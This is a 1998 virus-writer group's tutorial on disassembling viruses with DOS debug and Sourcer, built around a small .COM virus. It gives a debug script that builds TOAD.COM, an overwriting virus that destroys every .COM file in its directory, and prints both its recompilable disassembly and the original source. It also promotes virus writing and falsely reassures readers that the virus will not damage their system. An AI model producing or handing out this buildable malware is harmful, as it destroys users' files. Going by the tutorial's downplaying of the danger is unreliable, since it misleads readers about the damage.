************************************************************************** Reverse Engineering: The Viral Approach. By HornyToad & Opic A CodeBreakers Production, (C) 1998 (http://www.Codebreakers.org) ************************************************************************** Technology is advancing at an alarming rate everyday. In order to keep up with the mainstream, industry programmers have had to utilize software reverse engineering to stay abreast of important advances. In a world of a million buzz words, 'reverse engineering' has made a place for itself as a respectable activity. Chuckling, I wonder if a thief will eventually be called an acquisition technician. Reverse engineering is simply a method of prying into software to steal other programmer's techniques. We're not passing judgement on this practice, quite the contrary, We're very proud to be an "engineers". In the field of virus writing and cracking, however, we tend to use the word disassembly more often than reverse engineering. As the title indicates, the majority of this text will be devoted to sparking interest in disassembling virus code. Disassembly can also be very helpful to the cracker and in general any professional programmer. The cracker might use the disassembled code to extract and change passwords and access privileges. The professional programmer will most likely be using the reverse engineering techniques to view others techniques and advances in programming. The virus writer will most likely be following in the footsteps of the professional programmer. Who knows that professional programmer might be a virus writer. Lets face it, if you want to learn how to program, do you want to rely on a boring underpaid teacher to inspire you? Or, would you like to learn how to program by creating a virus or hacking program? Trust me, virus writing is fascinating and challenging. The art of virus disassembly and examination has been a practice covered in a veil of ambiguity for quite a long time in the virus (and even more so in the anti-virus) community. And there is a logical reason for this when you consider it; On the side of the VX community: "If anyone knows how to disassemble and debug my virus, they can learn my techniques (which many virus writers don't want) as well as the fact that AV can more easily scan for and disinfect the virus after examination." On the side of the AV: "If people understand how viruses work, and can even write their own disinfection routines, or remove a virus infection manually then the mystical hysteria that a viral infection brings can no longer be used to my advantage to sell my anti-virus product" (cough-cough-mcafee-cough-cough). So no matter which side of the fence you stand on it should be clear that virus disassembly should be a major part of your viral studies. If you are a member of the AV community and find it yourself in conflict with the fact that you are learning or reading this tutorial which comes from the side of the VX, take heart! The AV community will teach you the exact same thing that we are teaching you in this tutorial...**for a price** (as usual) 600 pounds is the last figure we saw for a cute little luncheon with a complimentary diskette with some virus from the 80's and some shareware AV program. So take your pick, we personally find the VX side to be more noble working in the pursuit of knowledge, as the AV works in pursuit of all encompassing '$' sign. The virus community has undergone many changes in the past 10 years. In the beginning, darkness covered the abyss... This beginning passage from the Bible described the state of virus source code in the late 80's and early 90's. The push in the virus community was to release virus executables, rather than the revealing source code. Therefore, in order for the knowledge to spread throughout the underground, coders relied on disassemblies. Disassemblies were often very crude in those days and rarely worked. They did, however, shed light on the virus writer's strategy, which, for the most part, was enough to guide beginners in the right direction. Over the years, the focus of the virus community has changed. Currently, the most common practice is to publish source code along with the executable. In fact, many virus writers prefer to publish only the source code. The intellectual advances are becoming more important to the coders than the destructive actions of the executable. We prefer to see the coder's original source, rather than an executable. Even though we have a test machines for watching how a virus works, viewing the original source is the most precise method to learning the virus writer's techniques. Unfortunately, this change in strategy, releasing the source code, has led to the weakening of disassembly skills, primarily in the use of the debugger. A debug program is one that allows you to manipulate and view memory locations, registers, and individual program instructions. The DOS debug program is a powerful tool for prying open executables and exploiting the source code. We must footnote that a thorough knowledge of assembly language is necessity in order to fully exploit debug. This article assumes that you are familiar with the basic assembly instructions. Our primary goal in writing this article is to spawn interest in the reader to disassemble executables. Don't be afraid to uncover the secrets of the original programmer. Debug There are many fine disassemblers out on the market. If you are willing to pay the big bucks, take a look at such programs as Sourcer, IDA, and SoftIce. Before you go out there and spend a lot of money on a big name program, take a look at the one that you already have, Debug. No, we're not crazy. Look in your \windows\command directory. We'll bet it's there. If not, do a search of your dos files, it's hiding somewhere on your drive. Go to a dos prompt and type debug. You should see the debug prompt "-" on the next line. Debug is loaded into memory and is ready to use. To quit out of debug, press "Q" then . Lets first take a quick look at the debug commands: *Hint* All numbers passed to debug are assumed to be hex. You do not need to add the "h" at the end of the number. We would recommend buying a calculator that handles hex conversion. *Hint* Please find a copy of the MS-DOS Users Guide. It is very helpful for learning some of the basics about DOS operations. It also contains a very informative guide to debug usage. All of the debug commands are explained with examples. A must for your library! (A)ssemble)- Allows you to input assembly statements and translates "A" and press . You will be returned an address in the form of segment:offset. The default offset for this command is 100. (C)ompare- In order to compare two areas of memory, type "c memLocA range memLocB". This command defaults with the data segment. The memory contents will be displayed side by side. (D)isplay- Used simply to view a memory location. Again the default register is DS for this command, but you can specify any segment you want. For example, "-D CS:100 ", displays 80 hex bytes (default) beginning at CS:100. The length can be specified other than the default by including "L" in the command line, for example, "-D CS:100 L100". (E)nter- Allows you to enter data or machine code into a specified location. Typing: E cs:100 B4 4E 33 C9 BA 2F 01 CD 21 72 1B B8 02 3D BA 9E will enter this line of code starting at address cs:100. (F)ill- Useful for filling a memory location with a specified value. Type: -f 100 500 'Codebreakers Rule!' This will fill the memory locations from 100 to 500 with some important words to remember. Type 'd 100' to see them. (G)o- Executes the program loaded into memory to a specified breakpoint. (H)exadecimal- This is your handy dandy hex calculator. Enter 'H ', and debug will return the hex sum and difference of the two values. Very useful! (I)nput- displays a byte from a port address. (L)oad- Very useful command! This command allows you to load a program or disk sectors into debug. "-L " loads a file into memory. "-L
" or "-L 100 0 10 20" loads from drive A(0) to CS:100, sector 10 and displays 20 sectors. Obviously the default for this command is CS. (M)ove- moves contents of one location to another. Default is DS. Syntax: -m ds:100 l50 DS:300 This will move from ds:100, 50 bytes to location ds:300. (N)ame- Names a file that you entered. (O)utput- Sends a byte to a port. (P)roceed- Executes through a routine. (Q)uit- Quits debug. (R)egister- Displays the registers and the next instruction. (S)earch- Searches a specified range through default DS for a "string" or data entity. Returns location if found. (T)race- Begins executing a program in single step mode. A range can be specified. (U)nassemble- Produces assembly instructions for a specified range or simply 32 bytes when unspecified. Default is CS. (W)rite- Writes a (N)amed file to disk, in essence, this is your save command. We think that the best way to learn how to use debug is through a practical example. In general people always learn faster when they have hands-on training. Well, that's what you are going to get. And guess what, you are going to perform your first virus disassembly! We have specifically chosen a small uncomplicated virus for this first example. Below, you will see a debug script to create an instructional virus from the CodeBreakers VX magazine. Study the commands. The first line (N)ames a program called TOAD.COM starting at CS:100. As you can see, the next several lines (E)nter machine code until CS:01B4. The line, "RCX" and subsequent line, "00B4" loads the program length into CX. When in doubt as to the length of the program, look at the offset at the beginning of the line, in this case 01B0. Then count single bytes across to the final piece of code entered,"24", 4 bytes across. Easy. The next line (W)rites the program (TOAD.COM). The final line quits out of debug. We hope that you are already realizing the wealth of information that you can get from using the debug program. Save the information below in a file called "toad.txt". At a dos prompt, type: "debug toad.txt ". Debug will then execute the instructions in toad.txt and present you with a functional virus, toad.com. Do not worry about this virus spreading and destroying your system, it won't. This a very simple com overwriting virus. Follow my instructions and nothing will happen. N TOAD.COM E 0100 B4 4E 33 C9 BA 2F 01 CD 21 72 1B B8 02 3D BA 9E E 0110 00 CD 21 93 B4 40 B9 B4 00 BA 00 01 CD 21 B4 3E E 0120 CD 21 B4 4F EB DC B4 09 BA 35 01 CD 21 CD 20 2A E 0130 2E 63 6F 6D 00 43 6F 6E 67 72 61 74 75 6C 61 74 E 0140 69 6F 6E 73 21 20 59 6F 75 20 68 61 76 65 20 69 E 0150 6E 66 65 63 74 65 64 20 61 6C 6C 20 74 68 65 20 E 0160 43 4F 4D 20 66 69 6C 65 73 20 69 6E 20 74 68 69 E 0170 73 20 0A 0D 64 69 72 65 63 74 6F 72 79 20 77 69 E 0180 74 68 20 74 68 65 20 54 6F 61 64 20 69 6E 73 74 E 0190 72 75 63 74 69 6F 6E 61 6C 20 76 69 72 75 73 2E E 01A0 20 48 61 76 65 20 61 20 6E 69 63 65 20 64 61 79 E 01B0 2E 0A 0D 24 RCX 00B4 W Q In a way, I cheated by giving you the machine code to the virus ahead of time. Normally, the task of the disassembler (coder) would be to produce source from only the executable. Anyway, now that you have the working virus executable, lets get to work. Load toad.com into a debug session by typing: A:\debug toad.com <- type - <- debug prompt (ready for action) Remember that executable code begins after the

rogram egment

refix at CS:100. What we therefore need to do is view the egisters and find out the length of toad.com. Typing "r" at the debug prompt, allows you to see the values of the registers. The important one that we are looking for first is the initial value of CX. CX holds the length of the program. In this case B4 (or 180) bytes. Take a moment to study the different registers. Notice that the "r command also printed the assembly code for the first instruction. 278E:0100 is the segment:offset address for CS:100, or the beginning of the program. Notice also that the IP is set to 100. "B44E" disassembles to the assembly instruction "MOV AH,4E". -r AX=0000 BX=0000 CX=00B4 DX=0000 SP=FFFE BP=0000 SI=0000 DI=0000 DS=278E ES=278E SS=278E CS=278E IP=0100 NV UP EI PL NZ NA PO NC 278E:0100 B44E MOV AH,4E - Now that we have the length of the program, we can isplay, or dump the program's machine code to the screen. This is accomplished by isplaying from CS:100 for a ength of b4. Observe below that the data portion of the virus follows directly after the executable portion. This is the first clue that we have as to the offset for the data structure. From the beginning of the data portion of the code, any assembly instructions that debug "translates" for you will be bogus. Type: -d cs:100 lb4 278E:0100 B4 4E 33 C9 BA 2F 01 CD-21 72 1B B8 02 3D BA 9E .N3../..!r...=.. 278E:0110 00 CD 21 93 B4 40 B9 B4-00 BA 00 01 CD 21 B4 3E ..!..@.......!.> 278E:0120 CD 21 B4 4F EB DC B4 09-BA 35 01 CD 21 CD 20 2A .!.O.....5..!. * 278E:0130 2E 63 6F 6D 00 43 6F 6E-67 72 61 74 75 6C 61 74 .com.Congratulat 278E:0140 69 6F 6E 73 21 20 59 6F-75 20 68 61 76 65 20 69 ions! You have i 278E:0150 6E 66 65 63 74 65 64 20-61 6C 6C 20 74 68 65 20 nfected all the 278E:0160 43 4F 4D 20 66 69 6C 65-73 20 69 6E 20 74 68 69 COM files in thi 278E:0170 73 20 0A 0D 64 69 72 65-63 74 6F 72 79 20 77 69 s ..directory wi 278E:0180 74 68 20 74 68 65 20 54-6F 61 64 20 69 6E 73 74 th the Toad inst 278E:0190 72 75 63 74 69 6F 6E 61-6C 20 76 69 72 75 73 2E ructional virus. 278E:01A0 20 48 61 76 65 20 61 20-6E 69 63 65 20 64 61 79 Have a nice day 278E:01B0 2E 0A 0D 24 ...$ - In both the above listing and below, it is easy to determine the end of the program instructions. In this case, find the CD 20 (int 20) instruction which terminates the virus. Directly after the CD 20 at location CS:012D, the first sign of a data portion appears, hex 2A, the * character. -u cs:100 l2f 278E:0100 B44E MOV AH,4E 278E:0102 33C9 XOR CX,CX 278E:0104 BA2F01 MOV DX,012F 278E:0107 CD21 INT 21 278E:0109 721B JB 0126 278E:010B B8023D MOV AX,3D02 278E:010E BA9E00 MOV DX,009E 278E:0111 CD21 INT 21 278E:0113 93 XCHG BX,AX 278E:0114 B440 MOV AH,40 278E:0116 B9B400 MOV CX,00B4 278E:0119 BA0001 MOV DX,0100 278E:011C CD21 INT 21 278E:011E B43E MOV AH,3E 278E:0120 CD21 INT 21 278E:0122 B44F MOV AH,4F 278E:0124 EBDC JMP 0102 278E:0126 B409 MOV AH,09 278E:0128 BA3501 MOV DX,0135 278E:012B CD21 INT 21 278E:012D CD20 INT 20 It is important that you are aware of what bogus assembly instructions look like. This is where an understanding of basic assembly is required. Take a look below at code before the break. It is easy to decipher what the actual instructions are. You might even recognize what the virus is doing from this little snip of code. Then, after the int 20, all hell breaks loose. What the hell is this "sub ch,[6f63]" ? What an eye sore! When code begins to look like this, you are going to be forced to draw a conclusion: 1. The code segment has ended. 2. The data segment might be starting. 3. We may be dealing with code polymorphism or encryption. There are other possibilities, but for the sake of the beginner, at a minimum, recognize that a change has occurred. 278E:0122 B44F MOV AH,4F 278E:0124 EBDC JMP 0102 278E:0126 B409 MOV AH,09 278E:0128 BA3501 MOV DX,0135 278E:012B CD21 INT 21 278E:012D CD20 INT 20 ------------------------------------------------------------- 278E:012F 2A2E636F SUB CH,[6F63] 278E:0133 6D DB 6D 278E:0134 00436F ADD [BP+DI+6F],AL 278E:0137 6E DB 6E 278E:0138 67 DB 67 278E:0139 7261 JB 019C 278E:013B 7475 JZ 01B2 278E:013D 6C DB 6C 278E:013E 61 DB 61 278E:013F 7469 JZ 01AA Once you are comfortable with moving around a program within debug, it is now time to formulate an intelligent looking disassembly. We'd like to classify disassembly into two different forms, the utility disassembly and the work of art. The utility disassembly is when someone simply copies the debug output into a file and gives it an asm extension. This code can look quite ugly and may not even work. The work of art is when someone includes assembler specific instructions to the asm file, gives meaningful symbolic names, translates data, and comments the code. For example: 1. Assembler specific instructions: If you are using TASM, for example, and the virus is of COM file type, include such directives as: code segment assume cs:code,ds:code org 100h : : code ends end start You might even want to include TASM compile instructions like: ;TASM nameOfVirus.ASM ;TLINK /t nameOfVirus.OBJ Including the above instructions/structures to the code will aid people who might not be TASM literate in assembling the virus. 2. Meaningful symbolic names: During disassembly, whether through debug or an expensive disassembler, symbolic names of procedures, labels, and variables are lost. Debug translates them as actual memory addresses. Disassemblers often assign them with meaningless names like "loc_1". Take a look at the examples below. Which one of them would be easier for a beginner to understand? They both accomplish the same end result, although, the code on top, is more self-explanitory and is easier for the beginner to understand. find_first: mov ah,4eh xor cx,cx lea dx,comFile int 21h jc outMessage or loc_1: mov ah,4Eh xor cx,cx mov dx,12Fh int 21h jc loc_2 3. Translate data: Once more, which one looks better? Enough said. It might be tedious breaking out the ASCII code chart and translating the data section, but when someone looks at your disassembly, they will appreciate it. db '*.com', 0 db 'Congratulations! You have infect' or db 2Ah, 2Eh, 63h, 6Fh, 6Dh, 00h, 43h, 6Fh, 6Eh, 67h, 72h, 61h db 74h, 75h, 6Ch, 61h, 74h, 69h, 6Fh, 6Eh, 73h, 21h, 20h, 59h db 6Fh, 75h, 20h, 68h, 61h, 76h, 65h, 20h, 69h, 6Eh, 66h, 65h db 63h, 74h 4. Comment your code: We have had many programming teachers say that you can never put too many comments into your code. We have heard an equal amount say that there only need to be a few concise comments. Its a never ending battle. We would tend to recommend including more comments in than not enough. Many beginners are given the advice that, in order to learn assembly, you have to study source code. That's fine and dandy, but when you're not necessarily comfortable with assembly, looking at naked code can give you a headache. Try to provide enough comments so that the beginner can understand how each line fits in to the program's operation. For example: mov ah,3Eh ;function 3Eh-close file int 21h ;go dos! mov ah,4Fh ;function 4Fh-find next file jmp find_file ;jump to find next file to infect Essentially, that's all there is to it. Extract the assembly instructions and data through the use of debug into an asm file. Tidy the code up, add comments and turn the file into a work of art by following the few pointers that we stated above. We realize that this is very short and sweet, but in order to include everything about debugging operations, We would need to write a book. There are many more techniques which need to be implemented to counteract anti-debugging techniques. Thankfully, many of the more powerful disassemblers on the market today can defeat the majority of anti-debugging techniques. After trying hard to sell you on debug, We have to admit that we more often use Turbo Debugger by Borland for viewing code. Essentially, both programs accomplish the same thing. But, Turbo Debugger's delivery is very sweet. As you trace through your code, in separate windows you can view the flags and registers changing dynamically. There is a window in the lower right-hand corner of the screen that allows you to view the stack as values are pushed and popped off of it. Breakpoints are easy to set, so that you can execute your program up unto a certain point, checking the registers and flags to see the results. All in all, Turbo Debugger is a fascinating program and learning tool. We highly recommend it. Now, lets take a quick look at the same virus executable, but this time we'll put it under a slightly different microscope: a disassembler. What do we need to get started? We are going to start out with the most simple and effective set up we can. So first things first; go collect the tools that you don't have from the list below. Tools we need: 1)A good disassembler (duh) or two. Many people will argue that this disassembler is better then that one and this one sucks because that one...blah,blah,blah, Your Boring us! The fact is that a disassembler program is a tool: just a tool. You use it WITH your intellect and can make it as valuable or as worthless as you wish. There are a lot of disassemblers out there but this is the one we are going to be working with because first of all it is relatively easy to use and second is fairly accurate and widely available: Sourcer 7.0 (or higher) if you can acquire it. Our other suggestion is probably an even better disassembler: IDA. But it is much more difficult to acquire, and is VERY large in size, you may feel free to try the demo version but you will not be able to save your disassemblies (very cheap on their part) so we choose not to use examples from it in this tutorial. However, we would suggest that you cross reference (double-check) your disassemblies from Sourcer with that of IDA's as well as through a debugger. This will help you in recreating a more precise disassembly. 2)The Ralf Brown Int list-this is IMPERATIVE in disassembly! You can acquire these at: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/ralf/pub/WWW/files.html or: http://www.simtel.net/pub/simtelnet/msdos/info/ (the file intwin**.zip -currently intwin57.zip...still updating) 3)TOAD.COM -overwriting virus which can be found in debug script in the debugging portion of this tutorial or from Codebreakers VX Zine #1 available at: http://www.codebreakers.org. Alright now we are going to start from the ground up. What is a disassembly? Simply it is drawing the source code of an executable program from the program itself. This is EXTREMELY useful in learn programming tricks and examining code that you do not understand and do not have the source code to. It is even more useful to the virus writer whom can acquire through WWW or his/her contacts a copy of just about any virus in executable form,but which coming across source code to can be impossible. Now let us interject some of the problems we see today with most virus disassemblies and what it truly means to do a disassembly. Most viral disassemblies that you will download off the net are very very sloppy code which in almost any instance wont even compile (and often if they will, will function NOTHING like the original virus did). This is due to usually one simple factor: the executable was run through a disassembler without being examined, corrected, altered etc. In other words the person doing the disassembly just ran it through the program and zipped it up.This is a almost useless and definitely fruitless practice which we would like to see an end to. What does it mean to do a "real" disassembly? Well the most accurate disassemblies are done through debug with notepad open recording step by step what the virus does. BUT, many of us do not have the time to do such disassemblies, and we will argue that a disassembly done through one of today's disassembler programs combined with some foot work on the part of the rev engineer mixed with a bit of debugging (to clarify the gray areas of the disassembly) can do AS good if not a BETTER job,as the 100% debug route. The three most important aspects of doing a disassembly of a program are: 1)Know how to set the options on your disassembler to create the most accurate disassembly possible. 2)Having another disassembler and debugger to cross reference with (I.E:alot of disassemblers make errors and it is good to use more then one to get a more accurate "picture" of the program you are disassembling. 3)Do NOT just leave the disassembly as it lies when it comes out of the disassembler. The ASM file that comes from the disassembler is the RAW material from which we will sculpt a working functioning likeness of the original virus from. We will need to clean it up, get rid of junk inserted by the disassembler, get rid of locational numbers, and give labels more descriptive names. And while we are doing that we will intuitively begin to get a better sense of the virus we are disassembling. You should have the Ralf Brown files open during your entire "cleaning process" to refer to. Constantly double check strange int's and sub-functions, make the code "human" again. We find the easiest way to illustrate this process is to show you it step by step. We will show you examples from Sourcer 7.0, what settings and options we have chosen, and how they look in their RAW form straight from the disassemblers. 1)Disassembly of TOAD.COM using Sourcer 7.0 Settings: Input file:TOAD.COM Target assembler: TASM 5.0 (We know that TASM was what was used to originally assemble this virus, so we will choose the most current version of tasm as a newer version almost always supports code from older versions but not visa versa. It is worthwhile to investigate what assembler the author of the virus you are disassembling preferred as it will aid you in your entire disassembly. Also choose: (functional match). Output filename: TOAD.ASM File format: press F so that output displays .asm is displayed so we can do away with those annoying segment addresses and what not Sourcer will otherwise insert. Remarks:all. why not? Lets see what Sourcer can help us with. Label type: We choose decimal, they are all annoying but this one is easiest for me, this is pretty much just preference here. OK, thats a pretty decent setup for Sourcer, lets see what it came up with: --------------------------------------------------------------------------- PAGE 59,132 ;UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU ;UU UU ;UU TOAD UU ;UU UU ;UU Created: 19-Oct-97 UU ;UU Passes: 5 Analysis Options on: none UU ;UU UU ;UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU target EQU 'T5' ; Target assembler: TASM-5.0 include srmacros.inc ; The following equates show data references outside the range of the program. data_1e equ 9Eh seg_a segment byte public assume cs:seg_a, ds:seg_a org 100h toad proc far start: mov ah,4Eh ; 'N' loc_1: xor cx,cx ; Zero register mov dx,12Fh int 21h ; DOS Services ah=function 4Fh ; find next filename match jc loc_2 ; Jump if carry Set mov ax,3D02h mov dx,data_1e int 21h ; DOS Services ah=function 3Dh ; open file, al=mode,name@ds:dx xchg bx,ax mov ah,40h ; '@' mov cx,0B4h mov dx,100h int 21h ; DOS Services ah=function 40h ; write file bx=file handle ; cx=bytes from ds:dx buffer mov ah,3Eh int 21h ; DOS Services ah=function 3Eh ; close file, bx=file handle mov ah,4Fh ; 'O' jmp short loc_1 loc_2: mov ah,9 mov dx,offset data_4 ; ('Congratulations! You hav') int 21h ; DOS Services ah=function 09h ; display char string at ds:dx int 20h ; DOS program terminate db '*.com', 0 data_4 db 'Congratulations! You have infect' db 'ed all the COM files in this ', 0Ah db 0Dh, 'directory with the Toad ins' db 'tructional virus. Have a nice da' db 'y.', 0Ah, 0Dh, '$' toad endp seg_a ends end start ---------------------------------------------------------------------------- O.K, not bad, not bad at all really. If we like we can attempt to recompile this code and see if it compiles and runs properly. It looks fairly legible, so what we can do is run it through IDA to see if we get any differences in code construction or content. While we may not see much here because this is a simple overwriting virus, We can assure you that you will see it in more complex code (We will talk about some common disassembler flaws and errors later on). Go ahead and run Toad.com through the demo version of IDA (if you have it) and you'll see very little variation in code. Which means we can move on to the next step of cleaning and commenting the code. Here is the code after we have sifted through it removed the junk Sourcer includes and renaming locations and data labels as well as clearing up odd bits of code. ---------------------------------------------------------------------------- ;************************************************************************** ; TOAD Overwriting Virus ; ; Disassembly By Opic [CodeBreakers '98] ; ; Recompilable with TASM/TLINK ; ;NOTES: TOAD is a simple .COM overwriting virus. I have little to say about ;this virus as it is very uninteresting by nature, and has little value ;other then as an instructive device. ;************************************************************************** virus segment byte public assume cs:virus, ds:virus org 100h toad proc near ;was far, disassembler ;incosistancy start: ;start of virus code mov ah,4Eh ;function 4eh-find first file find_file: xor cx,cx ;clears CX register mov dx,filespec ;12Fh points to *.com so ;well just rename it with ;a label to make life easier int 21h ;go DOS! jc no_more_files ;If there are no more files ;to infect (i.e. if carry ;flag is set) then jump here mov ax,3D02h ;open file for read/write acess mov dx,9eh ;get file info ;ok heres a small difference ;in the disassembly...in which ;sourcer had mov dx,data_1e ;data_1e being: 9eh ;so lets just cut out the ;middle man (as the author ;probably did...... int 21h ;Go dos! ; xchg bx,ax ;puts file handle in bx from ax mov ah,40h ;function 40h-write to file mov cx,offset end_virus - offset find_file ;this is the length we want to ;write to the file we are ;infecting...it is the same as ;mov cx,0B4h which the length ;of our virus from 100h (start ;of .com file) lea dx, start ;esentially again the same ;command we are just making it ;more 'human' for the reader ;this is telling us to start ;writing from the 'start' label ;which is conviently located at ;100h thus same as: mov dx,100h int 21h ;go dos! mov ah,3Eh ;function 3Eh-close file int 21h ;go dos! mov ah,4Fh ;function 4Fh-find next file jmp find_file ;jump to find next file to ;infect no_more_files: mov ah,9 ;function 9-write string to ;standard output. ie: write a ;message on the screen mov dx,offset message ;get the message from the ;data segment int 21h ;go dos! ; int 20h ;int 20h-DOS program ;terminate filespec db '*.com', 0 message db 'Congratulations! You have infected all the COM files in this ',10,13, db 'directory with the Toad instructional virus. Have a nice day.',10,13,'$' ;here we just put the message back together in more cohesive order and changed ;the hex from 0Ah, 0Dh to its logical same: 10,13. end_virus label near ;just our ;formal closings toad endp seg_a ends end find_file ;makes sense yes? ---------------------------------------------------------------------------- Now you see? It looks very clean and is even more legible then the code produced by Sourcer. All we have really done is given expressive labels to some code that was either given a generic label such as: data_1e or given code expressed in hexadecimal such as 0B4h with the expressive label: offset end_virus - offset find_file. We have also corrected any small syntax errors which Sourcer may have produced. This is the point at which we need to double check that the code compiles and the virus runs and infects properly. If bugs are encountered we can use debugger to walk through the executable step by step to see where we have strayed from the original source and where specifically our errors lie. Alright, now it's time for the big test, lets compare our disassembly with Horny Toad's original source and see how it compares. ---------------------------------------------------------------------------- code segment assume cs:code,ds:code org 100h toad proc near first_fly: mov ah,4eh find_fly: xor cx,cx lea dx,comsig int 21h jc wart_growth open_fly: mov ax,3d02h mov dx,9eh int 21h eat_fly: xchg bx,ax mov ah,40h mov cx,offset horny - offset first_fly lea dx,first_fly int 21h stitch_up: mov ah,3eh int 21h mov ah,4fh jmp find_fly wart_growth: mov ah,09h mov dx,offset wart int 21h cya: int 20h comsig db "*.com",0 wart db 'Congratulations! You have infected all the COM files in this ',10,13 db 'directory with the Toad instructional virus. Have a nice day.',10,13,'$' horny label near toad endp code ends end first_fly ----------------------------------------------------------------------------- Ahh...you see? Identical! that's right, Using the executable file TOAD.COM I have derived the original source code instruction for instruction. As you have probably already guessed this feat increases in difficulty exponentially with the complexity of the virus you are disassembling, however using the same intuition we used to clean up this code we can create logical patches and fixes in sections of the code produced by the disassembler which would otherwise not function properly. This is the area of disassembly when using a secondary disassembler and debugging come in very handy in finding the problem areas created by the initial disassembly. A true and accurate disassembly should incorporate a debugger verifying the majority of code produced by the disassembler. Other things to be aware of: There are a few other things we'd like to touch on before we draw this to a close. The first is simply that especially when doing reverse engineering it is important to understand the ways a virus, or any program for that matter functions on a 'technical' level. By this we mean you should understand simple concepts that a surprising amount of coders do not fully understand; i.e. understanding hexadecimal values, segment addresses, and other basic aspects of 8086 architectural structure. We mention these because it is very likely that you will run into some difficulty in making a disassembly due to this very fact. Allow me to illustrate with a simple example: Suppose you came across this line of code in a disassembly: mov dx,12Fh o.k. so we know we are moving something to the data register from 12Fh so we go to 12Fh in the data segment and we find: seg000:012F db 2Ah seg000:0130 db 2Eh seg000:0131 db 63h seg000:0132 db 6Fh seg000:0133 db 6Dh seg000:0134 db 0 WTF is that? This is the point where most new coders stop and say "Fuck it anyways!" and it can be frustrating to see 50-200 lines of this, but with a bit of luck we can make this fall into place. Its really simply just ASCII text in hexadecimal form! Watch: db 2Ah ;* db 2Eh ;. db 63h ;c db 6Fh ;o db 6Dh ;m db 0 ;0 Of course! Its the filespec db '*.com',0 the type of file we are searching for. It was simply the form that it was presented to us that was confusing. That is what much of reverse-engineering is about: taking the code OUT of the machine language and putting it BACK in to a moreunderstandable human language. As for converting hex to ASCII and visa versa many dissemblers will do it for you, some will not, in any case it proves worthwhile to get a good book on assembly which will provide you with hex to ASCII conversions. Another thing to be aware of is some common errors made by disassemblers. One such error is when the disassembler decides to translate a block of assembly instructions in a block of data. When viewed, the block will look like a chunk of useless meaningless data. Unfortunately, that chunk of "data" might be as important as a interrupt handler. The key in understanding, or shall I say translating, the data will be to look at the program code. Think to yourself: "What is missing in the program? How and when is the chunk of data being called?" You might even have to take a look at it through a debugger and even possibly encapsulate the code with breakpoints to see what it actually affects. In the end, you only option might be to substitute the "data" with your own assembly instructions. Be very careful when attempting to do this. And yet another important fact to keep in mind when examining viruses is that many viruses quite literally do NOT want to be examined. That is to say; they have been programmed with many anti anti-virus, anti-heuristic, anti-debugger, and anti-disassembler routines which make examination a even more difficult process, and sometimes even a risky one. The same rule we learned as a child when dealing with wild animals applies here: If you cannot identify an animal don't get close enough to let it harm you. This is a pretty safe rule to live by, but I'm sure some of you wont live by it, as we didn't, as a child and now ;) But you should keep yourself on top of ideas and advances in armored programming. Most times armored programming is not harmful but just creates an immense amount of difficulty in examining the code, however we have heard of and seen some pretty nasty tricks laid inside virii waiting for the Anti-virus researcher to examine, such as hooking int 3 (which is an essential int when examining programs in debug) and redirecting the debugger (when run upon the virus) to do anything...some from simply displaying a witty message onto the debug screen and then exiting without allowing the code to be examined all the way to wiping entire disks. Though it is fairly rare to come across a virus that will actually punish the reverse engineer, they do exist and we felt the necessity to inform you of their existence. Be smart, use your background knowledge of the virus you are examining, and we're sure that the beast won't bite back. Hopefully, this has prepared you to begin doing quality disassemblies of virus code. You will learn ALOT about assembly language doing them, and you will be contributing to the VX community by making precise source code to popular and effective virii available again, for others to learn from and build upon. So until next time viewing audience; The computer is a wonderful microcosm in which man can play god. Is the AV holding the hands of evolution back? Ask Darwin. - Horny Toad and Opic [Codebreakers '98]